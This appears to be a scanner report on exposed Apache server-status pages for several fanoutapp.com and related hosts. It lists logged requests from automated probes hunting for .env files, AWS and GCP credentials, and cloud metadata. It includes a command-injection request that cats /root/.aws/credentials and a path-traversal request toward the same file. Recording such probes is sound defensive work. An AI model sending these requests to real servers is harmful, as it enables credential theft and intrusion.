127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-4417320230/7/1127_ 0.194397710.00.093.26 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-4417320230/8/1172_ 0.1943113660.00.023.59 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4417320240/29/1326_ 0.5304178460.00.063.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-4417320240/26/1322_ 0.5173121990.00.063.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4417320240/24/1298_ 0.5103137100.00.053.41 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4417320240/25/1346_ 0.5174126220.00.083.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4417320240/27/1296_ 0.5163133130.00.063.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/28/1339_ 0.5173130770.00.063.86 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-4417320240/26/1342_ 0.5163108290.00.053.94 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/27/1327_ 0.5263101430.00.213.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/27/1324_ 0.5259123220.00.123.89 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4417320240/25/1312_ 0.5263100290.00.053.62 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-4417320240/25/1332_ 0.5253118550.00.053.81 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4417320240/24/1301_ 0.5343107120.00.053.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/26/1295_ 0.532398400.00.063.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-4417320240/25/1311_ 0.5353120250.00.054.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4417320240/24/1316_ 0.5338124860.00.053.57 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-4417320240/25/1309_ 0.5333113710.00.053.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-4417320240/25/1325_ 0.5333104250.00.063.84 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4417320240/27/1301_ 0.5323122680.00.063.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-4417320240/25/1294_ 0.532396330.00.063.84 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-4417320240/27/1338_ 0.5313116170.00.133.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-4417320240/27/1315_ 0.5313115530.00.053.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-4417320240/27/1315_ 0.5313105190.00.063.68 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-4417320240/26/1306_ 0.5313107000.00.053.58 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-4417320240/28/1334
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf5401187f
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Sunday, 04-Jan-2026 04:37:40 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 45 Parent Server MPM Generation: 44 Server uptime: 43 days 6 hours 43 minutes 4 seconds Server load: 0.26 0.22 0.17 Total accesses: 99834 - Total Traffic: 275.0 MB - Total Duration: 862625 CPU Usage: u74.66 s112.83 cu1210.89 cs359.59 - .047% CPU load .0267 requests/sec - 77 B/second - 2888 B/request - 8.64059 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01732023no2yes124020 11732024no1yes025010 Sum203 149030 ___________________W______________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4417320230/9/1172_ 0.1943163030.00.103.40 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/8/1129_ 0.1935101630.00.093.64 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-4417320230/8/1152_ 0.1933120130.00.092.89 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/8/1133_ 0.1933101360.00.093.26 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4417320230/8/1150_ 0.1923107370.00.093.69 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4417320230/9/1131_ 0.192386540.00.093.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-4417320230/7/1164_ 0.182389290.00.093.61 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-4417320230/8/1163_ 0.1923100040.00.093.46 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-4417320230/6/1150_ 0.1923110220.00.094.10 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-4417320230/9/1171_ 0.191388370.00.093.66 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-4417320230/7/1161_ 0.1913103260.00.094.24 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/9/1168_ 0.1913124650.00.093.73 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/6/1139_ 0.201193660.00.023.33 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/7/1136_ 0.200396890.00.163.37 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4417320230/7/1151_ 0.2001121260.00.093.44 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/9/1146_ 0.200391540.00.023.68 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4417320230/8/1156_ 0.2003102160.00.023.67 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4417320230/9/1159_ 0.2101103210.00.103.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/7/1142_ 0.2003116670.00.023.27 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-4417320235/6/1142W 0.1900111920.00.023.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4417320230/7/1147_ 0.1953104140.00.023.12 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-4417320230/7/1149_ 0.1943109230.00.093.42 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-4417320230/7/1150_ 0.1953114890.00.093.47 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-4417320230/7/1127_ 0.194397710.00.093.26 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-4417320230/8/1172_ 0.1943113660.00.023.59 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4417320240/29/1326_ 0.5314178460.00.063.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-4417320240/26/1322_ 0.5183121990.00.063.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4417320240/24/1298_ 0.5113137100.00.053.41 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4417320240/25/1346_ 0.5184126220.00.083.96 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4417320240/27/1296_ 0.5173133130.00.063.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/28/1339_ 0.5173130770.00.063.86 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-4417320240/26/1342_ 0.5173108290.00.053.94 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/27/1327_ 0.5273101430.00.213.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/27/1324_ 0.5259123220.00.123.89 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4417320240/25/1312_ 0.5263100290.00.053.62 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-4417320240/25/1332_ 0.5263118550.00.053.81 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4417320240/24/1301_ 0.5343107120.00.053.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-4417320240/26/1295_ 0.533398400.00.063.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-4417320240/25/1311_ 0.5353120250.00.054.18 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-4417320240/24/1316_ 0.5338124860.00.053.57 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-4417320240/25/1309_ 0.5343113710.00.053.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-4417320240/25/1325_ 0.5333104250.00.063.84 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-4417320240/27/1301_ 0.5333122680.00.063.72 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-4417320240/25/1294_ 0.532396330.00.063.84 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-4417320240/27/1338_ 0.5323116170.00.133.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-4417320240/27/1315_ 0.5323115530.00.053.66 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-4417320240/27/1315_ 0.5313105190.00.063.68 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-4417320240/26/1306_ 0.5313107000.00.053.58 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-4417320240/28/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf5f894dda
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Friday, 02-Jan-2026 22:01:35 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 43 Parent Server MPM Generation: 42 Server uptime: 42 days 6 minutes 59 seconds Server load: 0.22 0.18 0.17 Total accesses: 96183 - Total Traffic: 265.9 MB - Total Duration: 844037 CPU Usage: u73.45 s110.32 cu1160.72 cs343.56 - .0465% CPU load .0265 requests/sec - 76 B/second - 2898 B/request - 8.77532 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 31553263no1yes025010 41553264no1yes124010 Sum202 149020 ................................................................ ..........._________________________________________W________... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-36-0/0/1163. 0.00514703522156340.00.003.30 127.0.0.1http/1.1api.hnstream.com:8000GET /service-account.json HTTP/1.1 0-36-0/0/1121. 0.00514703431101380.00.003.55 127.0.0.1http/1.1api.hnstream.com:8000GET /config/environment.json HTTP/1.1 0-36-0/0/1144. 0.00514703419119640.00.002.80 127.0.0.1http/1.1api.hnstream.com:8000GET /tsconfig.json HTTP/1.1 0-36-0/0/1125. 0.00514703302101120.00.003.17 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.postmark HTTP/1.1 0-36-0/0/1142. 0.00514703458107040.00.003.60 127.0.0.1http/1.1api.hnstream.com:8000GET /config/prod.json HTTP/1.1 0-36-0/0/1122. 0.0051470330485930.00.003.42 127.0.0.1http/1.1api.hnstream.com:8000GET /latest/dynamic/instance-identity/document HTTP/1.1 0-36-0/0/1157. 0.0051470319389010.00.003.52 127.0.0.1http/1.1api.hnstream.com:8000GET /crm/.env HTTP/1.1 0-36-0/0/1155. 0.0051470328499470.00.003.37 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.docker.dev HTTP/1.1 0-36-0/0/1144. 0.00514703415109940.00.004.01 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.prod.local HTTP/1.1 0-36-0/0/1162. 0.0051470326987960.00.003.57 127.0.0.1http/1.1api.hnstream.com:8000GET /.htaccess HTTP/1.1 0-36-0/0/1154. 0.00514703227102960.00.004.15 127.0.0.1http/1.1api.hnstream.com:8000GET /hosting.json HTTP/1.1 0-36-0/0/1159. 0.00514703215118480.00.003.64 127.0.0.1http/1.1api.hnstream.com:8000GET /application/config/migration.php HTTP/1.1 0-36-0/0/1133. 0.0051470327093410.00.003.31 127.0.0.1http/1.1api.hnstream.com:8000GET /config/module.config.php HTTP/1.1 0-36-0/0/1129. 0.0051470328788710.00.003.21 127.0.0.1http/1.1api.hnstream.com:8000GET /appsettings.Staging.json HTTP/1.1 0-36-0/0/1144. 0.00514703395120960.00.003.35 127.0.0.1http/1.1api.hnstream.com:8000GET /.aws/config HTTP/1.1 0-36-0/0/1137. 0.0051470349091120.00.003.65 127.0.0.1http/1.1api.hnstream.com:8000GET /root/.aws/credentials HTTP/1.1 0-36-0/0/1148. 0.00514703504101800.00.003.64 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.bak HTTP/1.1 0-36-0/0/1150. 0.0051470339095710.00.003.03 127.0.0.1http/1.1api.hnstream.com:8000GET /phpinfo HTTP/1.1 0-36-0/0/1135. 0.00514703301116260.00.003.25 127.0.0.1http/1.1api.hnstream.com:8000GET /home/*/.aws/credentials HTTP/1.1 0-36-0/0/1136. 0.00514703508111570.00.003.12 127.0.0.1http/1.1api.hnstream.com:8000GET /infophp.php HTTP/1.1 0-36-0/0/1140. 0.00514703281103830.00.003.10 127.0.0.1http/1.1api.hnstream.com:8000GET /metrics HTTP/1.1 0-36-0/0/1142. 0.00514703518108920.00.003.33 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.dev HTTP/1.1 0-36-0/0/1143. 0.00514703173114650.00.003.38 127.0.0.1http/1.1api.hnstream.com:8000GET /local/.env HTTP/1.1 0-36-0/0/1120. 0.0051470342997460.00.003.17 127.0.0.1http/1.1api.hnstream.com:8000GET /temp.php HTTP/1.1 0-36-0/0/1164. 0.00514703483112750.00.003.57 127.0.0.1http/1.1api.hnstream.com:8000GET /config.js HTTP/1.1 1-36-0/0/1297. 0.00514704284170510.00.003.60 127.0.0.1http/1.1api.hnstream.com:8000GET /.env~ HTTP/1.1 1-36-0/0/1296. 0.00514704223120810.00.003.81 127.0.0.1http/1.1api.hnstream.com:8000GET /application/config/routes.php HTTP/1.1 1-36-0/0/1274. 0.00514704232136080.00.003.36 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.save HTTP/1.1 1-36-0/0/1321. 0.00514704137125420.00.003.88 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.stage HTTP/1.1 1-36-0/0/1269. 0.00514704570132070.00.003.36 127.0.0.1http/1.1api.hnstream.com:8000GET /config/aws.yml HTTP/1.1 1-36-0/0/1311. 0.00514704519129590.00.003.80 127.0.0.1http/1.1api.hnstream.com:8000GET /.DS_Store HTTP/1.1 1-36-0/0/1316. 0.00514704490107540.00.003.89 127.0.0.1http/1.1api.hnstream.com:8000GET /.vscode/settings.json HTTP/1.1 1-36-0/0/1300. 0.00514704539100050.00.003.42 127.0.0.1http/1.1api.hnstream.com:8000GET /.ssh/sftp-config.json HTTP/1.1 1-36-0/0/1297. 0.00514704522122410.00.003.76 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.production HTTP/1.1 1-36-0/0/1287. 0.0051470414799590.00.003.57 127.0.0.1http/1.1api.hnstream.com:8000GET /config/services.php HTTP/1.1 1-36-0/0/1307. 0.00514704468117510.00.003.76 127.0.0.1http/1.1api.hnstream.com:8000GET /.idea/ HTTP/1.1 1-36-0/0/1277. 0.00514704500106370.00.003.37 127.0.0.1http/1.1api.hnstream.com:8000GET /.phpinfo HTTP/1.1 1-36-0/0/1269. 0.0051470451397480.00.003.53 127.0.0.1http/1.1api.hnstream.com:8000GET /stripe_credentials.json HTTP/1.1 1-36-0/0/1286. 0.00514704521119110.00.004.12 127.0.0.1http/1.1api.hnstream.com:8000GET /latest/meta-data/iam/security-credentials/ HTTP/1.1 1-36-0/0/1292. 0.00514704511123570.00.003.52 127.0.0.1http/1.1api.hnstream.com:8000GET /latest/user-data HTTP/1.1 1-36-0/0/1284. 0.00514704571113060.00.003.82 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.prod HTTP/1.1 1-36-0/0/1300. 0.00514704127103220.00.003.78 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.local HTTP/1.1 1-36-0/0/1274. 0.00514704558121170.00.003.66 127.0.0.1http/1.1api.hnstream.com:8000GET /.zshrc HTTP/1.1 1-36-0/0/1269. 0.0051470454795580.00.003.79 127.0.0.1http/1.1api.hnstream.com:8000GET /.wp-config.php.swp HTTP/1.1 1-36-0/0/1311. 0.00514704161110960.00.003.66 127.0.0.1http/1.1api.hnstream.com:8000GET /application/config/encryption.php HTTP/1.1 1-36-0/0/1288. 0.00514704507114830.00.003.60 127.0.0.1http/1.1api.hnstream.com:8000GET /gcp-key.json HTTP/1.1 1-36-0/0/1288. 0.00514704227104120.00.003.62 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.resend HTTP/1.1 1-36-0/0/1280. 0.00514704166105930.00.003.53 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.mailgun HTTP/1.1 1-36-0/0/1306. 0.00514704160103710.00.003.79 127.0.0.1http/1.1api.hnstream.com:8000GET /.envrc HTTP/1.1 1-36-0/0/1247. 0.00514704607116290.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf97b0d51c
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Saturday, 27-Dec-2025 01:11:13 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 37 Parent Server MPM Generation: 36 Server uptime: 35 days 3 hours 16 minutes 38 seconds Server load: 0.11 0.15 0.16 Total accesses: 76082 - Total Traffic: 218.7 MB - Total Duration: 659101 CPU Usage: u60.8 s93.36 cu1003.5 cs294.39 - .0478% CPU load .0251 requests/sec - 75 B/second - 3013 B/request - 8.66303 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01018361no0yes025000 11018360no2yes124020 Sum202 149020 ________________________________________________W_.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3610183610/1/1089_ 0.0322167139090.00.003.18 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 0-3610183610/0/1054_ 0.002216085810.00.003.46 206.168.34.214http/1.1api.hnstream.com:8000PRI * HTTP/2.0 0-3610183610/1/1069_ 0.0422161106310.00.002.68 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3610183610/1/1050_ 0.032219688460.00.002.98 127.0.0.1http/1.1api.hnstream.com:8000GET /config?cmd=cat+/root/.aws/credentials HTTP/1.1 0-3610183610/0/1068_ 0.002220091690.00.003.42 71.6.199.23http/1.1 0-3610183610/1/1054_ 0.0322191176130.00.003.32 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /phpinfo.php HTTP/1.1 0-3610183610/1/1090_ 0.031353477770.00.003.36 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /beta/.env HTTP/1.1 0-3610183610/1/1074_ 0.01221449685870.00.003.24 167.82.233.138http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-3610183610/1/1068_ 0.042213495830.00.003.81 127.0.0.1http/1.1api.hnstream.com:8000GET /.aws/credentials HTTP/1.1 0-3610183610/2/1083_ 0.032208476230.00.003.37 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /application/.env HTTP/1.1 0-3610183610/2/1079_ 0.042210490860.00.003.87 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-3610183610/1/1089_ 0.0422083106760.00.003.53 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /admin/.git/config HTTP/1.1 0-3610183610/2/1064_ 0.032203775930.00.003.13 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env.save HTTP/1.1 0-3610183610/0/1060_ 0.0033601677590.00.003.10 71.6.199.23http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3610183610/2/1068_ 0.0413583105960.00.003.23 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3610183610/2/1062_ 0.04116734776300.00.083.53 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-3610183610/1/1080_ 0.011162987040.00.003.54 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /phpinfo HTTP/1.1 0-3610183610/1/1081_ 0.04146582040.00.002.93 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-3610183610/2/1067_ 0.041441103170.00.003.14 127.0.0.1http/1.1api.hnstream.com:8000POST / HTTP/1.1 0-3610183610/2/1063_ 0.03139394990.00.012.99 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /config/.env HTTP/1.1 0-3610183610/2/1073_ 0.0513892450.00.012.99 204.76.203.93http/1.1api.hnstream.com:8000GET http://httpbin.org/ip HTTP/1.1 0-3610183610/2/1070_ 0.032225796620.00.013.22 127.0.0.1http/1.1editor.fanoutapp.com:8000POST / HTTP/1.1 0-3610183610/1/1069_ 0.03134106540.00.003.20 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /laravel/.env HTTP/1.1 0-3610183610/1/1048_ 0.03222155083170.00.003.06 127.0.0.1http/1.1api.hnstream.com:8000GET /?module=logging&file_name=../../../../../../~/.aws/credent 0-3610183610/1/1092_ 0.032213797210.00.003.45 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.env HTTP/1.1 1-3610183600/2/1234_ 0.0563159240.00.013.49 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3610183600/2/1235_ 0.0553109460.00.013.63 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3610183600/3/1208_ 0.05123124800.00.013.17 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-3610183600/2/1260_ 0.05113115290.00.013.78 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json HTTP/1.1 1-3610183600/2/1205_ 0.05113113600.00.013.25 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-3610183600/3/1247_ 0.05103114840.00.013.70 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api/swagger.json HTTP/1.1 1-3610183600/3/1250_ 0.0510392210.00.013.79 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-3610183600/2/1237_ 0.059387620.00.013.30 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /@vite/env HTTP/1.1 1-3610183600/2/1229_ 0.0593108630.00.013.65 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 1-3610183600/2/1230_ 0.058290800.00.013.48 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-3610183600/2/1241_ 0.0583102270.00.013.60 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-3610183600/3/1216_ 0.058391500.00.013.26 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-3610183600/3/1206_ 0.057383810.00.013.42 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-3610183600/2/1218_ 0.0563103460.00.014.00 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 1-3610183600/3/1227_ 0.0543109290.00.013.42 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-3610183600/2/1223_ 0.053399340.00.013.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-3610183600/3/1238_ 0.053393250.00.013.60 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3610183600/3/1213_ 0.0533105950.00.013.39 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-3610183600/2/1209_ 0.062282330.00.013.62 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 1-3610183600/3/1248_ 0.0613103090.00.083.49 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-3610183600/3/1224_ 0.071399370.00.073.50 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 1-3610183600/3/1222_ 0.070392830.00.013.43 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3610183600/3/1216_ 0.070394440.00.013.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-36101836027/2/1246W 0.050093100.00.013.70 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf591fe6fb
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2025-04-02T18:34:29 Current Time: Thursday, 25-Dec-2025 04:32:40 UTC Restart Time: Friday, 21-Nov-2025 21:54:35 UTC Parent Server Config. Generation: 35 Parent Server MPM Generation: 34 Server uptime: 33 days 6 hours 38 minutes 5 seconds Server load: 0.04 0.12 0.14 Total accesses: 72518 - Total Traffic: 209.4 MB - Total Duration: 630610 CPU Usage: u58.06 s88.98 cu952.97 cs277.98 - .0479% CPU load .0252 requests/sec - 76 B/second - 3027 B/request - 8.69591 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0838794no1yes124010 1838793no1yes025010 Sum202 149020 ____________________W_____________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-348387940/7/1021_ 0.24113133420.00.013.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /api-docs/swagger.json 